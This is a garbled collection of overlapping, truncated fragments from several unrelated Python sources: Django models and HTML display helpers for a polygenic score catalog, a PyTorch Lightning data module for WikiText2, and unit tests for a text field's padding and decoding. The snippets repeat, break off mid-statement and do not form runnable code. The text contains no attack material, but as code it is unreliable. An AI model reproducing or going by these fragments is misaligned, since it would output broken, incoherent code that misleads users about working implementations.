Description', null=True) phenotype_structured", "MaxValueValidator, MinValueValidator from django.contrib.postgres.fields import DecimalRangeField class BM_Coding(models.Model): \"\"\"Class to describe the International", "class BM_EFOTrait(models.Model): \"\"\"Abstract class to hold information related to controlled trait vocabulary (mainly", "'<span class=\"only_export\">[</span>' sstring += '<ul>\\n<li>{:,} cases{}</li>\\n'.format(self.sample_cases, percent_cases) if self.sample_controls != None: sstring +=", "related to controlled trait vocabulary (mainly to link multiple EFO to a single", "[] helptip = '<span title=\"{}\" class=\"pgs_helptip\">{}</span> : {} {}' no_helptip = '{} :", "if self.variability != None: return '{}:{}'.format(self.variability_type, self.variability) return None def format_unit(self): if self.unit", "point estimates or distributions\"\"\" estimate = models.FloatField(verbose_name='Estimate (value)', null=True) estimate_type = models.CharField(verbose_name='Estimate (type)',", "return None def format_variability(self): if self.variability != None: return '{}:{}'.format(self.variability_type, self.variability) return None", "= class_acc_data othermetrics_list = self.othermetrics_list othermetrics_data = [] if othermetrics_list: for othermetrics in", "format the diverse metric data\"\"\" # Using all and filter afterward uses less", "# Links to related objects score_id = models.CharField('Polygenic Score (PGS) ID', max_length=30, db_index=True)", "return None def display_value(self): l = [] helptip = '<span title=\"{}\" class=\"pgs_helptip\">{}</span> :", "= models.TextField('Synonyms', null=True) #mapped_terms = models.TextField('Mapped terms', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_trait')", "max_length=100, null=False) # ex: \"Odds Ratio\" name_short = models.CharField(verbose_name='Performance Metric Name (Short)', max_length=25,", "range, interquartile range (iqr), open range variability = models.FloatField(verbose_name='Variability (value)', null=True) variability_type =", "= models.CharField(max_length=40, choices=TYPE_CHOICES, default='Other Metric', db_index=True ) name = models.CharField(verbose_name='Performance Metric Name', max_length=100,", "related objects score_id = models.CharField('Polygenic Score (PGS) ID', max_length=30, db_index=True) sample = models.ForeignKey(BM_Sample,", "None def format_unit(self): if self.unit != None: return '{}:{}'.format('unit', self.unit) return None def", "{}' # Estimate e = '' if self.estimate != None: e += '{}", "show/hide the details\">{:,} individuals <i class=\"fa fa-plus-circle\"></i></a></div>'.format(self.sample_number) sstring += '<div class=\"toggle_list\" id=\"list_'+div_id+'\">' sstring", "models.FloatField(verbose_name='Estimate (value)', null=True) estimate_type = models.CharField(verbose_name='Estimate (type)', max_length=100, null=True, default='mean') #e.g. [mean, median]", "to describe cohorts used in samples\"\"\" name_short = models.CharField('Cohort Short Name', max_length=100, db_index=True)", "Type', max_length=10) class BM_Cohort(models.Model): \"\"\"Class to describe cohorts used in samples\"\"\" name_short =", "e += '{} : {}'.format(self.estimate_type.title(), self.estimate) if self.range != None and self.range_type.lower() ==", "BM_Demographic(models.Model): \"\"\"Class to describe Sample fields (sample_age, followup_time) that can be point estimates", "else: v = no_helptip.format(self.variability_type.title(), self.variability, self.unit) if v != None: l.append(v) # Range", "of Recruitment', null=True) ancestry_additional = models.TextField('Additional Ancestry Description', null=True) ## Cohorts/Sources #source_GWAS_catalog =", "return round(percent,2) else: return None def display_samples_for_table(self, show_percent_cases=False): div_id = \"sample_\"+str(self.pk) sstring =", "0 else '' # category_labels.append('<div{}><span class=\"trait_colour\" style=\"background-color:{}\"></span>{}</div>'.format(v_spacing,category.colour,category.label)) # categories_data = ''.join(category_labels) # return" ]
[ "train_dataloader(self): return DataLoader( dataset=self.train_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def val_dataloader(self): return DataLoader( dataset=self.valid_dataset,", "dataset=self.valid_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def test_dataloader(self): return DataLoader( dataset=self.test_dataset, batch_size=self.batch_size, shuffle=False, num_workers=self.num_workers,", "stage is None: self.train_dataset = WikiText2(split='train') self.valid_dataset = WikiText2(split='valid') # Assign test dataset", "stage is None: self.test_dataset = WikiText2(split='test') def train_dataloader(self): return DataLoader( dataset=self.train_dataset, batch_size=self.batch_size, shuffle=True,", "batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def test_dataloader(self): return DataLoader( dataset=self.test_dataset, batch_size=self.batch_size, shuffle=False, num_workers=self.num_workers, )", "def train_dataloader(self): return DataLoader( dataset=self.train_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def val_dataloader(self): return DataLoader(", "== \"fit\" or stage is None: self.train_dataset = WikiText2(split='train') self.valid_dataset = WikiText2(split='valid') #", "val_dataloader(self): return DataLoader( dataset=self.valid_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def test_dataloader(self): return DataLoader( dataset=self.test_dataset,", "# PIP from torch.utils.data import DataLoader from pytorch_lightning import LightningDataModule from torchtext.datasets import", "LightningDataModule from torchtext.datasets import WikiText2 # Custom class CustomDataModule(LightningDataModule): def __init__( self, batch_size=1,", "shuffle=True, num_workers=self.num_workers, ) def val_dataloader(self): return DataLoader( dataset=self.valid_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def", "is None: self.test_dataset = WikiText2(split='test') def train_dataloader(self): return DataLoader( dataset=self.train_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers,", "stage == \"fit\" or stage is None: self.train_dataset = WikiText2(split='train') self.valid_dataset = WikiText2(split='valid')", "self.train_dataset = WikiText2(split='train') self.valid_dataset = WikiText2(split='valid') # Assign test dataset if stage ==", "Standard # PIP from torch.utils.data import DataLoader from pytorch_lightning import LightningDataModule from torchtext.datasets", "self, batch_size=1, num_workers=0, ): super().__init__() self.batch_size = batch_size self.num_workers = num_workers def setup(", "batch_size self.num_workers = num_workers def setup( self, stage=None, ): # Assign train &", "\"test\" or stage is None: self.test_dataset = WikiText2(split='test') def train_dataloader(self): return DataLoader( dataset=self.train_dataset,", "val datasets if stage == \"fit\" or stage is None: self.train_dataset = WikiText2(split='train')", "num_workers def setup( self, stage=None, ): # Assign train & val datasets if", "import DataLoader from pytorch_lightning import LightningDataModule from torchtext.datasets import WikiText2 # Custom class", "PIP from torch.utils.data import DataLoader from pytorch_lightning import LightningDataModule from torchtext.datasets import WikiText2", "self, stage=None, ): # Assign train & val datasets if stage == \"fit\"", ") def val_dataloader(self): return DataLoader( dataset=self.valid_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def test_dataloader(self): return", "Assign test dataset if stage == \"test\" or stage is None: self.test_dataset =", "or stage is None: self.test_dataset = WikiText2(split='test') def train_dataloader(self): return DataLoader( dataset=self.train_dataset, batch_size=self.batch_size,", "def __init__( self, batch_size=1, num_workers=0, ): super().__init__() self.batch_size = batch_size self.num_workers = num_workers", "None: self.train_dataset = WikiText2(split='train') self.valid_dataset = WikiText2(split='valid') # Assign test dataset if stage", "# Custom class CustomDataModule(LightningDataModule): def __init__( self, batch_size=1, num_workers=0, ): super().__init__() self.batch_size =", "self.test_dataset = WikiText2(split='test') def train_dataloader(self): return DataLoader( dataset=self.train_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def", "): # Assign train & val datasets if stage == \"fit\" or stage", "WikiText2(split='train') self.valid_dataset = WikiText2(split='valid') # Assign test dataset if stage == \"test\" or", "pytorch_lightning import LightningDataModule from torchtext.datasets import WikiText2 # Custom class CustomDataModule(LightningDataModule): def __init__(", "= WikiText2(split='valid') # Assign test dataset if stage == \"test\" or stage is", "Custom class CustomDataModule(LightningDataModule): def __init__( self, batch_size=1, num_workers=0, ): super().__init__() self.batch_size = batch_size", "self.valid_dataset = WikiText2(split='valid') # Assign test dataset if stage == \"test\" or stage", "from torch.utils.data import DataLoader from pytorch_lightning import LightningDataModule from torchtext.datasets import WikiText2 #", "# Standard # PIP from torch.utils.data import DataLoader from pytorch_lightning import LightningDataModule from", "is None: self.train_dataset = WikiText2(split='train') self.valid_dataset = WikiText2(split='valid') # Assign test dataset if", "num_workers=self.num_workers, ) def val_dataloader(self): return DataLoader( dataset=self.valid_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def test_dataloader(self):", "DataLoader( dataset=self.train_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def val_dataloader(self): return DataLoader( dataset=self.valid_dataset, batch_size=self.batch_size, shuffle=True,", "if stage == \"fit\" or stage is None: self.train_dataset = WikiText2(split='train') self.valid_dataset =", "== \"test\" or stage is None: self.test_dataset = WikiText2(split='test') def train_dataloader(self): return DataLoader(", "stage == \"test\" or stage is None: self.test_dataset = WikiText2(split='test') def train_dataloader(self): return", "WikiText2 # Custom class CustomDataModule(LightningDataModule): def __init__( self, batch_size=1, num_workers=0, ): super().__init__() self.batch_size", "datasets if stage == \"fit\" or stage is None: self.train_dataset = WikiText2(split='train') self.valid_dataset", "train & val datasets if stage == \"fit\" or stage is None: self.train_dataset", "\"fit\" or stage is None: self.train_dataset = WikiText2(split='train') self.valid_dataset = WikiText2(split='valid') # Assign", "class CustomDataModule(LightningDataModule): def __init__( self, batch_size=1, num_workers=0, ): super().__init__() self.batch_size = batch_size self.num_workers", "# Assign train & val datasets if stage == \"fit\" or stage is", "torchtext.datasets import WikiText2 # Custom class CustomDataModule(LightningDataModule): def __init__( self, batch_size=1, num_workers=0, ):", "batch_size=1, num_workers=0, ): super().__init__() self.batch_size = batch_size self.num_workers = num_workers def setup( self,", "import WikiText2 # Custom class CustomDataModule(LightningDataModule): def __init__( self, batch_size=1, num_workers=0, ): super().__init__()", "import LightningDataModule from torchtext.datasets import WikiText2 # Custom class CustomDataModule(LightningDataModule): def __init__( self,", "__init__( self, batch_size=1, num_workers=0, ): super().__init__() self.batch_size = batch_size self.num_workers = num_workers def", "DataLoader( dataset=self.valid_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def test_dataloader(self): return DataLoader( dataset=self.test_dataset, batch_size=self.batch_size, shuffle=False,", "stage=None, ): # Assign train & val datasets if stage == \"fit\" or", "def setup( self, stage=None, ): # Assign train & val datasets if stage", "return DataLoader( dataset=self.valid_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def test_dataloader(self): return DataLoader( dataset=self.test_dataset, batch_size=self.batch_size,", "= num_workers def setup( self, stage=None, ): # Assign train & val datasets", "self.batch_size = batch_size self.num_workers = num_workers def setup( self, stage=None, ): # Assign", "setup( self, stage=None, ): # Assign train & val datasets if stage ==", "batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def val_dataloader(self): return DataLoader( dataset=self.valid_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, )", "= batch_size self.num_workers = num_workers def setup( self, stage=None, ): # Assign train", "None: self.test_dataset = WikiText2(split='test') def train_dataloader(self): return DataLoader( dataset=self.train_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, )", "dataset=self.train_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def val_dataloader(self): return DataLoader( dataset=self.valid_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers,", "return DataLoader( dataset=self.train_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def val_dataloader(self): return DataLoader( dataset=self.valid_dataset, batch_size=self.batch_size,", "WikiText2(split='valid') # Assign test dataset if stage == \"test\" or stage is None:", "test dataset if stage == \"test\" or stage is None: self.test_dataset = WikiText2(split='test')", "WikiText2(split='test') def train_dataloader(self): return DataLoader( dataset=self.train_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def val_dataloader(self): return", "from torchtext.datasets import WikiText2 # Custom class CustomDataModule(LightningDataModule): def __init__( self, batch_size=1, num_workers=0,", "num_workers=0, ): super().__init__() self.batch_size = batch_size self.num_workers = num_workers def setup( self, stage=None,", "self.num_workers = num_workers def setup( self, stage=None, ): # Assign train & val", "def val_dataloader(self): return DataLoader( dataset=self.valid_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def test_dataloader(self): return DataLoader(", "# Assign test dataset if stage == \"test\" or stage is None: self.test_dataset", "= WikiText2(split='test') def train_dataloader(self): return DataLoader( dataset=self.train_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def val_dataloader(self):", "DataLoader from pytorch_lightning import LightningDataModule from torchtext.datasets import WikiText2 # Custom class CustomDataModule(LightningDataModule):", "& val datasets if stage == \"fit\" or stage is None: self.train_dataset =", "dataset if stage == \"test\" or stage is None: self.test_dataset = WikiText2(split='test') def", "super().__init__() self.batch_size = batch_size self.num_workers = num_workers def setup( self, stage=None, ): #", "or stage is None: self.train_dataset = WikiText2(split='train') self.valid_dataset = WikiText2(split='valid') # Assign test", "CustomDataModule(LightningDataModule): def __init__( self, batch_size=1, num_workers=0, ): super().__init__() self.batch_size = batch_size self.num_workers =", "if stage == \"test\" or stage is None: self.test_dataset = WikiText2(split='test') def train_dataloader(self):", "torch.utils.data import DataLoader from pytorch_lightning import LightningDataModule from torchtext.datasets import WikiText2 # Custom", "): super().__init__() self.batch_size = batch_size self.num_workers = num_workers def setup( self, stage=None, ):", "from pytorch_lightning import LightningDataModule from torchtext.datasets import WikiText2 # Custom class CustomDataModule(LightningDataModule): def", "= WikiText2(split='train') self.valid_dataset = WikiText2(split='valid') # Assign test dataset if stage == \"test\"", "Assign train & val datasets if stage == \"fit\" or stage is None:" ]
[ "init_token is properly handled. field = data.TextField(fix_length=4, init_token=\"<bos>\") minibatch = [[\"a\", \"sentence\", \"of\",", "== expected_output assert field.decode(np.asarray(word_idxs)) == expected_output # Single caption word_idxs = [0, 3,", "# Test init_token is properly handled. field = data.TextField(fix_length=4, init_token=\"<bos>\") minibatch = [[\"a\",", "caption word_idxs = [0, 3, 2, 1] expected_output = 'a c' test_all_dtypes(word_idxs, expected_output)", "[[]] expected_output = ['', ] assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output", "= MyVocab(field.eos_token) # Empty captions (not tested for PyTorch tensors) word_idxs = []", "2, 1], [3, 3, 2, 1], [2, 1, 1, 1]] expected_output = ['a", "= [3, 2, 3] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=3, include_lengths=True) assert", "\"last\", \"sent\"]] expected_lengths = [4, 3, 4] assert field.pad(minibatch) == expected_padded_minibatch field =", "\"data\", \".\"], [\"yet\", \"another\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"one\", \"last\", \"sent\", \"<pad>\", \"<pad>\"]] expected_lengths", "(expected_padded_minibatch, expected_lengths) field = data.TextField(fix_length=3, truncate_first=True) expected_padded_minibatch = [[\"of\", \"data\", \".\"], [\"yet\", \"another\",", "assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output # Single caption word_idxs =", "== expected_output # Single caption word_idxs = [0, 3, 2, 1] expected_output =", "c' test_all_dtypes(word_idxs, expected_output) # Batch of captions word_idxs = [[0, 3, 2, 1],", "3] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths)", "== expected_output assert field.decode(np.asarray(word_idxs)) == expected_output assert field.decode(torch.from_numpy(np.asarray(word_idxs))) == expected_output class MyVocab(object): def", "def __init__(self, eos_token): self.itos = {0: 'a', 1: 'b', 2: eos_token, 3: 'c'}", "data import numpy as np import torch '''class TestImageField(object): def test_preprocessing(self): field =", "field = data.TextField(fix_length=4, init_token=\"<bos>\") minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"],", "expected_output = 'a c' test_all_dtypes(word_idxs, expected_output) # Batch of captions word_idxs = [[0,", "init_token and eos_token are properly handled. field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\") minibatch = [[\"a\",", "expected_lengths) # Test fix_length properly truncates and pads. field = data.TextField(fix_length=3) minibatch =", "test_pad(self): # Default case. field = data.TextField() minibatch = [[\"a\", \"sentence\", \"of\", \"data\",", "= data.TextField(fix_length=4, init_token=\"<bos>\") minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\",", "expected_output) # Batch of captions word_idxs = [[0, 3, 2, 1], [3, 3,", "\".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [ [\"<bos>\", \"a\", \"sentence\", \"of\",", "field.decode(np.asarray(word_idxs)) == expected_output assert field.decode(torch.from_numpy(np.asarray(word_idxs))) == expected_output class MyVocab(object): def __init__(self, eos_token): self.itos", "include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) def test_decode(self): def test_all_dtypes(word_idxs, expected_output): assert field.decode(word_idxs)", "[[\"a\", \"sentence\", \"of\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] expected_lengths = [3, 2,", "\"<eos>\"], [\"<bos>\", \"yet\", \"another\", \"<eos>\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\", \"<eos>\",", "1], [3, 3, 2, 1], [2, 1, 1, 1]] expected_output = ['a c',", "= data.TextField(fix_length=3) minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\",", "\"<eos>\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\", \"<eos>\", \"<pad>\", \"<pad>\"]] expected_lengths =", "== expected_padded_minibatch field = data.TextField(fix_length=4, init_token=\"<bos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) #", "expected_lengths = [3, 2, 3] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=3, include_lengths=True)", "expected_padded_minibatch = [[\"<bos>\", \"a\", \"sentence\", \"of\"], [\"<bos>\", \"yet\", \"another\", \"<pad>\"], [\"<bos>\", \"one\", \"last\",", "eos_token, 3: 'c'} field = data.TextField() field.vocab = MyVocab(field.eos_token) # Empty captions (not", "== expected_padded_minibatch field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) def", "\"<pad>\"], [\"one\", \"last\", \"sent\"]] assert field.pad(minibatch) == expected_padded_minibatch # Test init_token is properly", "\"data\", \".\", \"<eos>\"], [\"<bos>\", \"yet\", \"another\", \"<eos>\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"<bos>\", \"one\", \"last\",", "field = data.TextField(fix_length=4, init_token=\"<bos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test init_token", "== (expected_padded_minibatch, expected_lengths) # Test init_token and eos_token are properly handled. field =", "\"yet\", \"another\", \"<eos>\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\", \"<eos>\", \"<pad>\", \"<pad>\"]]", "expected_output = '' assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output word_idxs =", "import numpy as np import torch '''class TestImageField(object): def test_preprocessing(self): field = data.ImageField()", "expected_output # Single caption word_idxs = [0, 3, 2, 1] expected_output = 'a", "field.decode(torch.from_numpy(np.asarray(word_idxs))) == expected_output class MyVocab(object): def __init__(self, eos_token): self.itos = {0: 'a', 1:", "\".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"],", "2, 1] expected_output = 'a c' test_all_dtypes(word_idxs, expected_output) # Batch of captions word_idxs", "# Single caption word_idxs = [0, 3, 2, 1] expected_output = 'a c'", "\"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"<bos>\", \"a\", \"sentence\", \"of\"],", "= [[\"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] assert field.pad(minibatch) ==", "'a', 1: 'b', 2: eos_token, 3: 'c'} field = data.TextField() field.vocab = MyVocab(field.eos_token)", "\"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\"],", "\"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [ [\"<bos>\", \"a\", \"sentence\",", "field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output word_idxs = [[]] expected_output = ['',", "[\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\"], [\"yet\", \"another\", \"<pad>\"],", "handled. field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\") minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\",", "assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) field = data.TextField(fix_length=3, truncate_first=True) expected_padded_minibatch = [[\"of\", \"data\",", "= data.TextField(fix_length=3, include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) field = data.TextField(fix_length=3, truncate_first=True) expected_padded_minibatch", "# Empty captions (not tested for PyTorch tensors) word_idxs = [] expected_output =", "'a c' test_all_dtypes(word_idxs, expected_output) # Batch of captions word_idxs = [[0, 3, 2,", "== expected_padded_minibatch field = data.TextField(fix_length=3, include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) field =", "field = data.TextField(fix_length=3, truncate_first=True) expected_padded_minibatch = [[\"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\"], [\"one\",", "(expected_padded_minibatch, expected_lengths) # Test init_token and eos_token are properly handled. field = data.TextField(init_token=\"<bos>\",", "\"data\", \".\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] assert field.pad(minibatch) == expected_padded_minibatch #", "\"sentence\", \"of\"], [\"<bos>\", \"yet\", \"another\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\"]] expected_lengths = [4,", "5] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\", include_lengths=True) assert field.pad(minibatch) ==", "word_idxs = [[]] expected_output = ['', ] assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs))", "[\"<bos>\", \"one\", \"last\", \"sent\"]] expected_lengths = [4, 3, 4] assert field.pad(minibatch) == expected_padded_minibatch", "expected_lengths) field = data.TextField(fix_length=3, truncate_first=True) expected_padded_minibatch = [[\"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\"],", "'' expected_image = '' assert field.preprocess(image) == expected_image ''' class TestTextField(object): def test_pad(self):", "\"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] expected_lengths", "\"of\"], [\"<bos>\", \"yet\", \"another\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\"]] expected_lengths = [4, 3,", "\"of\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] expected_lengths = [3, 2, 3] assert", "expected_padded_minibatch = [[\"a\", \"sentence\", \"of\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] expected_lengths =", "\"last\", \"sent\"]] expected_padded_minibatch = [[\"<bos>\", \"a\", \"sentence\", \"of\"], [\"<bos>\", \"yet\", \"another\", \"<pad>\"], [\"<bos>\",", "are properly handled. field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\") minibatch = [[\"a\", \"sentence\", \"of\", \"data\",", "data.TextField(fix_length=4, init_token=\"<bos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test init_token and eos_token", "data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) def test_decode(self): def test_all_dtypes(word_idxs, expected_output):", "= 'a c' test_all_dtypes(word_idxs, expected_output) # Batch of captions word_idxs = [[0, 3,", "field.vocab = MyVocab(field.eos_token) # Empty captions (not tested for PyTorch tensors) word_idxs =", "expected_output): assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output assert field.decode(torch.from_numpy(np.asarray(word_idxs))) == expected_output", "field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output assert field.decode(torch.from_numpy(np.asarray(word_idxs))) == expected_output class MyVocab(object):", "captions (not tested for PyTorch tensors) word_idxs = [] expected_output = '' assert", "\"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"one\", \"last\", \"sent\", \"<pad>\",", "expected_output assert field.decode(np.asarray(word_idxs)) == expected_output # Single caption word_idxs = [0, 3, 2,", "== expected_output class MyVocab(object): def __init__(self, eos_token): self.itos = {0: 'a', 1: 'b',", "[\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] expected_lengths = [3, 2, 3] assert field.pad(minibatch)", "expected_lengths) # Test init_token and eos_token are properly handled. field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\")", "\"sent\"]] expected_padded_minibatch = [ [\"<bos>\", \"a\", \"sentence\", \"of\", \"data\", \".\", \"<eos>\"], [\"<bos>\", \"yet\",", "expected_output assert field.decode(np.asarray(word_idxs)) == expected_output assert field.decode(torch.from_numpy(np.asarray(word_idxs))) == expected_output class MyVocab(object): def __init__(self,", "TestImageField(object): def test_preprocessing(self): field = data.ImageField() image = '' expected_image = '' assert", "field.pad(minibatch) == expected_padded_minibatch field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths)", "\"sent\"]] expected_lengths = [3, 2, 3] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=3,", "= [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch =", "1: 'b', 2: eos_token, 3: 'c'} field = data.TextField() field.vocab = MyVocab(field.eos_token) #", "'b', 2: eos_token, 3: 'c'} field = data.TextField() field.vocab = MyVocab(field.eos_token) # Empty", "assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output assert field.decode(torch.from_numpy(np.asarray(word_idxs))) == expected_output class", "4] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=4, init_token=\"<bos>\", include_lengths=True) assert field.pad(minibatch) ==", "of captions word_idxs = [[0, 3, 2, 1], [3, 3, 2, 1], [2,", "\"<pad>\", \"<pad>\", \"<pad>\"], [\"one\", \"last\", \"sent\", \"<pad>\", \"<pad>\"]] expected_lengths = [5, 2, 3]", "\"another\", \"<eos>\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\", \"<eos>\", \"<pad>\", \"<pad>\"]] expected_lengths", "(expected_padded_minibatch, expected_lengths) # Test fix_length properly truncates and pads. field = data.TextField(fix_length=3) minibatch", "\"<pad>\", \"<pad>\"]] expected_lengths = [7, 4, 5] assert field.pad(minibatch) == expected_padded_minibatch field =", "\"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\", \"<pad>\", \"<pad>\"],", "[\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\",", "3, 2, 1], [3, 3, 2, 1], [2, 1, 1, 1]] expected_output =", "[4, 3, 4] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=4, init_token=\"<bos>\", include_lengths=True) assert", "eos_token=\"<eos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) def test_decode(self): def test_all_dtypes(word_idxs, expected_output): assert", "\"sent\"]] assert field.pad(minibatch) == expected_padded_minibatch # Test init_token is properly handled. field =", "\"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\", \"data\",", "assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test fix_length properly truncates and pads. field", "= data.TextField() field.vocab = MyVocab(field.eos_token) # Empty captions (not tested for PyTorch tensors)", "[[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"one\", \"last\", \"sent\",", "\"sentence\", \"of\", \"data\", \".\", \"<eos>\"], [\"<bos>\", \"yet\", \"another\", \"<eos>\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"<bos>\",", "expected_image ''' class TestTextField(object): def test_pad(self): # Default case. field = data.TextField() minibatch", "\"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"<bos>\", \"a\",", "word_idxs = [[0, 3, 2, 1], [3, 3, 2, 1], [2, 1, 1,", "[7, 4, 5] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\", include_lengths=True) assert", "from __future__ import unicode_literals import unittest import speaksee.data as data import numpy as", "\"<pad>\"], [\"one\", \"last\", \"sent\", \"<pad>\", \"<pad>\"]] expected_lengths = [5, 2, 3] assert field.pad(minibatch)", "expected_lengths) def test_decode(self): def test_all_dtypes(word_idxs, expected_output): assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) ==", "import torch '''class TestImageField(object): def test_preprocessing(self): field = data.ImageField() image = '' expected_image", "1] expected_output = 'a c' test_all_dtypes(word_idxs, expected_output) # Batch of captions word_idxs =", 